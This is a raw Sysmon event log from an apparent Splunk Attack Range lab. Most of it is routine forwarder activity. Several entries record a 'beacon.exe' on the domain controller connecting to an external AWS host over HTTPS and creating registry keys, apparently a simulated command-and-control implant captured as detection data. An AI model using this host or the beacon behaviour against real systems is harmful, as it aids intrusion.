Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2ED301AE47E4701B0ECF3C51B7B3393E,SHA256=210EBB9B9C10647816CD98A21277BFD8FCE40073E8B35DD465F3D928859B66CBfalsetrue 23542300x800000000000000021219546Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:51.492{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5400CA53CA9CB0634785B22D72E650EC,SHA256=50A3DDCA69F392E6D32C0DE69EC59D58AF81CA9864EBF6514BFD3A9D89025564,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345228Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:21.283{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local54537-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x800000000000000057345227Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:51.266{8B6011A9-886D-6164-0D00-00000000F101}9048492C:\Windows\system32\svchost.exe{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345226Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:51.266{8B6011A9-886D-6164-0D00-00000000F101}9048492C:\Windows\system32\svchost.exe{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000057345225Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:51.150{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345224Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:51.150{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2455755FDEFF83E917D762F4DB929CF0,SHA256=D4EF8B05169EE146653D91B6951D9DFD12AB0A375CA722B42B0BA64A300F2195falsetrue 12241200x800000000000000057345223Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:16:51.019{8B6011A9-886D-6164-1100-00000000F101}420C:\Windows\system32\svchost.exeHKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad 23542300x800000000000000021219547Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:52.508{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7DC61C6AE89AE2EEFF6928C999277C6,SHA256=B029C8DE48E421645192672EF2C41C37A108B416CB0C3904584455340E19FAE4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345232Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:52.170{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345231Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:52.169{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AED760311B63D7F53C753209E622503C,SHA256=0D20F5C613BAF7244CD34A98FBDA783A872B71070C284A47FFC86FE204571B0Bfalsetrue 11241100x800000000000000057345230Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:52.034{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345229Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:52.034{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A1311962790414AA80EE2AF06E9F3C3,SHA256=F6673897E3C5C958C82E21D6B324A6F4350167596E8D6B99A00CCCE90A57B916falsetrue 23542300x800000000000000021219548Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:53.524{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D617A377B62CC5ED66F0E18F1B581B98,SHA256=661E416AE84C62483834AC7F9A8A7696AFB41D4EAC13F28CA067E8BA6CE010EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345236Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:23.374{8B6011A9-887D-6164-2D00-00000000F101}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local50051- 354300x800000000000000057345235Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:23.373{8B6011A9-887D-6164-2D00-00000000F101}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local51843- 11241100x800000000000000057345234Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:53.204{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345233Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:53.204{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DECE8E88A42DD9B14AF845E4151CFC9B,SHA256=B9B75C57F3FE0EB26B0BD753FD7A67E7423F4BA824ED63C675C97FE56105AEE7falsetrue 23542300x800000000000000021219552Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:54.524{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDF183BF8FE050EE98236E40849A6DE8,SHA256=F6A0BD349AF6DA79FB9A3B00CBD91A1854E30DB52D0D3CC4A9B703E68C4BB742,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345241Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:25.556{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54538-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345240Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:54.204{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345239Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:54.204{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=677B6A5BF6A89ACE86C8878D9153A72D,SHA256=4B3BE54B9EA3FDBE391820723EF0D8F25B5195CB2CDA9DC27A81AA9714CD38FCfalsetrue 23542300x800000000000000021219551Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:54.414{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=891697F2599D083D47FB06C5765E8587,SHA256=B9EAEE6A2A7D3E15D8338DAB4852B8A13B84A596A289DA0D74BA8AA670B4F48D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219550Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:54.414{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93911DEBC1E1F02DA891BD8774199785,SHA256=E57CED94E722B1DCE871D603AC79202252894D56BE28DB5108C198A63B57D1A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000021219549Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:41.616{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64319-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345238Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:54.070{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345237Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:54.070{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=116E72EDD8F18F8B54EC89D317C1EE26,SHA256=F7438A8CBC6A1F1CCDB466850BE6736D97BEFE9FDCDB654DD8532E4720365D3Efalsetrue 23542300x800000000000000021219553Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:55.524{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=058E5E1811576CF91E5E0D561CCC54E3,SHA256=173C1601ABEC2C58EC1E5B9FC6DD35CC15E07E951C44E6998E7A5059A97922B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345243Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:55.219{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345242Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:55.219{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C8FD707C0634746BC5105E33DB409B0,SHA256=120E3D4F79F9DDC4AFC941EC201FA8FDD662A4DDD48F320A22F8985FA90D0709falsetrue 23542300x800000000000000021219554Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:56.539{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3346D3670C103BC550E677AFF9F96F8E,SHA256=294E487504997E6C05DD1A7AE46CF460E1863509AF890B61FD601061683C8A53,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345245Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:56.233{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345244Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:56.233{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3826F9E9ACA7BC3AF63BF6D5255516C1,SHA256=19C0443905980D6D359574735024D4B5FAF90A0F4677BF5FDC40B2FFEACC29A7falsetrue 23542300x800000000000000021219555Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:57.571{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3EEC5B25889E46313C28A729847C318,SHA256=BBF31E2CF823DA3FAD84547264A1B1E92E1EB9AE069B466A7332B7BE44F4E8D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345247Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:57.248{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345246Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:57.248{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5619504E2F047B192711A3F8BE8FEBDA,SHA256=64227124DFCF64A372D4B50B89FAF1E29E9A1FC1625C2563054C7C25C7EBC3C1falsetrue 23542300x800000000000000021219556Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:58.586{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=609D5408FA67ED6E6E0BAF05B85DF7AD,SHA256=7F7CF59D13E2DE0C3730C51963A4305D4DB555BD8B93EE0143FC579223F7B825,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345249Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:58.300{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345248Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:58.300{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C241E5CC7857B9D0A1D675DF8110C48,SHA256=591805D130F4CC7F57E557A836AC78C9CF4D9BCC2FD24A5A9B0BD7B0BD713721falsetrue 23542300x800000000000000021219559Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:59.649{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9D8990A38DD26EDA6B35ABA0926FA07,SHA256=C2870278DD2DA5838C1CFBAA7E11641D52FAB7DF40AFF1CF9813DDF2142F7D65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345256Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:30.599{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54539-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345255Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:59.314{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345254Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:59.314{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70BE207B96554733BCB9A2110B4B1423,SHA256=CAEF08122CB3BA5EE220623E3110D7215EFE6C1F918409783078BFF6373DDDFDfalsetrue 23542300x800000000000000021219558Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:59.477{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4FBC6B3DC780E6A0E71CF9E4017D175F,SHA256=033123DB806FBE14E5FFAF18015CD3238CF015159EE45A0BB478ABE9BDBCA0E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219557Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:59.477{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=891697F2599D083D47FB06C5765E8587,SHA256=B9EAEE6A2A7D3E15D8338DAB4852B8A13B84A596A289DA0D74BA8AA670B4F48D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345253Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:59.267{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345252Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:59.267{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA2670C9F3CF9A892A8F363AA484F0ED,SHA256=78B8F9DC3DD9784383414CA6E45D96A97275203E4BDF8FAF6139244EE135DB3Cfalsetrue 11241100x800000000000000057345251Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:59.266{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345250Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:59.266{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B5E3B9BAEFE1E7F17371681D71A7DE29,SHA256=BB3471A065CE4F20C56A63304249A4A25EE8AF31B6F302BE863F4CF9C4513E1Ffalsetrue 23542300x800000000000000021219561Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:00.649{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30B371C5E06CBAD399AEE9619873F8D6,SHA256=E964112BB80964B040577A5D0E1EBE50FF4DB6405611FC54B4DAEAE19F78FD05,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345258Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:00.324{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345257Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:00.324{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23EFB2C9BB05C609290C90EB4140F73D,SHA256=904E06F5EE73CEE8EB8CA0A5E6080BFA5F9A9D74DEA29059A987329C2645CD7Efalsetrue 354300x800000000000000021219560Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:46.663{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64320-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219562Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:01.680{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F73CFA1C40C2A7B28A9164D68DBA18E1,SHA256=85E3E0780E12BEDF8D25C79A0DF3AB57B1FC32144D03E43F49DF1FEC8BC2C329,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345260Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:01.329{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345259Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:01.329{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FD4FA6E958F4DE2C956D5E3266598C0,SHA256=3EB997487A581B82BC82C94F6BBDCFD171D3D972109A3C9324D81157D9430078falsetrue 12241200x800000000000000057345264Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:17:02.573{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057345263Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:17:02.568{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 11241100x800000000000000057345262Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:02.344{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345261Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:02.344{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 